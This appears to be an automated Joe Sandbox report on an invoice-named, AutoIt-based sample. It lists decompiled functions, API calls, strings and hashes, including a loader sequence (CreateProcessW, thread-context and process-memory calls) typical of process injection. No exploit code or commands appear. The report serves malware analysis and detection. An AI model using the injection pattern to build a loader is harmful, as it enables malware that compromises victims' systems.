                                          control_flow_graph 1995 e9e260-e9e30e call e9bc40 1998 e9e315-e9e33b call e9f170 CreateFileW 1995->1998 2001 e9e33d 1998->2001 2002 e9e342-e9e352 1998->2002 2003 e9e48d-e9e491 2001->2003 2007 e9e359-e9e373 VirtualAlloc 2002->2007 2008 e9e354 2002->2008 2004 e9e4d3-e9e4d6 2003->2004 2005 e9e493-e9e497 2003->2005 2009 e9e4d9-e9e4e0 2004->2009 2010 e9e499-e9e49c 2005->2010 2011 e9e4a3-e9e4a7 2005->2011 2012 e9e37a-e9e391 ReadFile 2007->2012 2013 e9e375 2007->2013 2008->2003 2014 e9e4e2-e9e4ed 2009->2014 2015 e9e535-e9e54a 2009->2015 2010->2011 2016 e9e4a9-e9e4b3 2011->2016 2017 e9e4b7-e9e4bb 2011->2017 2020 e9e398-e9e3d8 VirtualAlloc 2012->2020 2021 e9e393 2012->2021 2013->2003 2022 e9e4ef 2014->2022 2023 e9e4f1-e9e4fd 2014->2023 2024 e9e55a-e9e562 2015->2024 2025 e9e54c-e9e557 VirtualFree 2015->2025 2016->2017 2018 e9e4cb 2017->2018 2019 e9e4bd-e9e4c7 2017->2019 2018->2004 2019->2018 2026 e9e3da 2020->2026 2027 e9e3df-e9e3fa call e9f3c0 2020->2027 2021->2003 2022->2015 2028 e9e4ff-e9e50f 2023->2028 2029 e9e511-e9e51d 2023->2029 2025->2024 2026->2003 2035 e9e405-e9e40f 2027->2035 2031 e9e533 2028->2031 2032 e9e52a-e9e530 2029->2032 2033 e9e51f-e9e528 2029->2033 2031->2009 2032->2031 2033->2031 2036 e9e411-e9e440 call e9f3c0 2035->2036 2037 e9e442-e9e456 call e9f1d0 2035->2037 2036->2035 2042 e9e458 2037->2042 2043 e9e45a-e9e45e 2037->2043 2042->2003 2045 e9e46a-e9e46e 2043->2045 2046 e9e460-e9e464 CloseHandle 2043->2046 2047 e9e47e-e9e487 2045->2047 2048 e9e470-e9e47b VirtualFree 2045->2048 2046->2045 2047->1998 2047->2003 2048->2047
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E9E331
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E9E557
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID: K
                                          • API String ID: 204039940-902739187
                                          • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction ID: e60c2acefbbd72290ea6a677c502850d34282a2c3322eb8c9ff491b949e3f97b
                                          • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                          • Instruction Fuzzy Hash: 33A10470E00209EBDF14CFA4C894BEEBBB5BF48304F209559E611BB381D7759A81CBA5
                                          Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                            • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                            • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                          • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                          • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: <WL$\TL$%I$SL
                                          • API String ID: 1986988660-4199584472
                                          • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                          • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                          • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                          • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                                          Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2167 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                          • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                          • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                          • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                          • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                          • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                                          Function 00E9DFF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2520 e9dff0-e9e159 call e9bc40 call e9dee0 CreateFileW 2527 e9e15b 2520->2527 2528 e9e160-e9e170 2520->2528 2529 e9e210-e9e215 2527->2529 2531 e9e172 2528->2531 2532 e9e177-e9e191 VirtualAlloc 2528->2532 2531->2529 2533 e9e193 2532->2533 2534 e9e195-e9e1ac ReadFile 2532->2534 2533->2529 2535 e9e1ae 2534->2535 2536 e9e1b0-e9e1ea call e9df20 call e9cee0 2534->2536 2535->2529 2541 e9e1ec-e9e201 call e9df70 2536->2541 2542 e9e206-e9e20e ExitProcess 2536->2542 2541->2542 2542->2529
                                          APIs
                                            • Part of subcall function 00E9DEE0: Sleep.KERNEL32(000001F4), ref: 00E9DEF1
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E9E14F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: PD9XR0W7FH8XIDKNWOLAUVV54X4
                                          • API String ID: 2694422964-3516752874
                                          • Opcode ID: 5773e1090c5f8a66ca788a68a1dfa00b88f3a40417d6852568d53515f677784c
                                          • Instruction ID: fcf7d4a4dfc5894e1d41c0ba975dc80b9820846ec63421b367666a2b8e327a8c
                                          • Opcode Fuzzy Hash: 5773e1090c5f8a66ca788a68a1dfa00b88f3a40417d6852568d53515f677784c
                                          • Instruction Fuzzy Hash: 1A617430D08288DAEF11DBB4C844BEFBBB9AF15304F044599E2497B2C1D7BA1B45CB65
                                          Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2544 40407c-404092 2545 404098-4040ad call 407a16 2544->2545 2546 40416f-404173 2544->2546 2549 4040b3-4040d3 call 407bcc 2545->2549 2550 43d3c8-43d3d7 LoadStringW 2545->2550 2553 43d3e2-43d3fa call 407b2e call 406fe3 2549->2553 2554 4040d9-4040dd 2549->2554 2550->2553 2563 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2553->2563 2566 43d400-43d41e call 407cab call 406fe3 call 407cab 2553->2566 2556 4040e3-4040e8 call 407b2e 2554->2556 2557 404174-40417d call 408047 2554->2557 2556->2563 2557->2563 2563->2546 2566->2563
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • _memset.LIBCMT ref: 004040FC
                                          • _wcscpy.LIBCMT ref: 00404150
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                          • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                          • Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                          • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                          Function 00E9CEE0 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00E9D69B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E9D731
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E9D753
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                          • Instruction ID: e670834786fd508b406cd8eb65c8b955df3afe64779da82638a2c7de613a6e97
                                          • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                          • Instruction Fuzzy Hash: 1862F930A182589BEB24DFA4CC50BDEB376EF58304F1091A9D10DFB394E6799E81CB59
                                          Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                          • _free.LIBCMT ref: 0043E263
                                          • _free.LIBCMT ref: 0043E2AA
                                            • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: aaad6bcedd136023f92f981be4e473ea1aa388c68f80fcbb4218e136d78f71b3
                                          • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                          • Opcode Fuzzy Hash: aaad6bcedd136023f92f981be4e473ea1aa388c68f80fcbb4218e136d78f71b3
                                          • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                          Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                          • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                          • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                          • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                          • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                          Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                          • _free.LIBCMT ref: 004696A2
                                          • _free.LIBCMT ref: 004696A9
                                          • _free.LIBCMT ref: 00469714
                                            • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                            • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                          • _free.LIBCMT ref: 0046971C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                          Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                          Function 00B8B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNEL32 ref: 00B8B2BA
                                          • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00B8B2E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$PointerWrite
                                          • String ID:
                                          • API String ID: 539440098-0
                                          • Opcode ID: 2cea9c5fb16f1857870711d2aeb9b97fb0cefbbc55465093b196813f3ac4a826
                                          • Instruction ID: 2ce51495fcd799427865555304a6ec488e63eaf7eaed78259d6d8097b76bc78b
                                          • Opcode Fuzzy Hash: 2cea9c5fb16f1857870711d2aeb9b97fb0cefbbc55465093b196813f3ac4a826
                                          • Instruction Fuzzy Hash: 03314F6040C384AED711BF358859F2FBFE0EB96724F4885CDE4949A2B1D3B98908D757
                                          Function 004044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 004044CF
                                            • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                            • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                            • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                          • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                          • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                          • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                          Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: AU3!P/I$EA06
                                          • API String ID: 4104443479-1914660620
                                          • Opcode ID: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                          • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                          • Opcode Fuzzy Hash: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                          • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                          Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0043EA39
                                          • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                            • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                            • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
